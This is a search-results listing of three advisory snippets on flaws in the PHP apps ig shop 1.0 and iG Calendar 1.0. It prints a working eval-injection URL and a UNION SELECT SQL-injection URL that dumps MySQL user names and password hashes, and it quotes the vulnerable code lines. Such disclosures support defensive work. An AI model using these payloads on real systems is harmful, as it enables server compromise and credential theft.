3 matches found
ig shop 1.0 (eval/SQL Injection) Multiple Vulnerabilities
No description provided by source. If eval is the answer, then you are asking the wrong question. --Unknowen ig-shop suffers from two eval's that can be controlled by an attacker: http://127.0.0.1/igshop/cart.php?action=;phpinfo;// ./cart.php line 692: eval cart$action;;...
SQL Injection in ig-Calendar
SQL Injection in ig-Calendar. This works regardless of magicquotesgpc! Dumps mysql login informaion: http://127.0.0.1/ig-calendar/user.php?id=99920union20select201,User,Password,Host,Filepriv,020from20mysql.user ./user.php line 52: $query = 'SELECT FROM users WHERE id='.$id; Should have used quot...
iG Calendar 1.0 - user.php?id SQL Injection
iG Calendar 1.0 - user.php?id SQL Injection SQL Injection in ig-Calendar. This works regardless of magicquotesgpc! Dumps mysql login informaion: http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,Filepriv,0%20from%20mysql.user ./user.php line 52: $query = 'SELECT...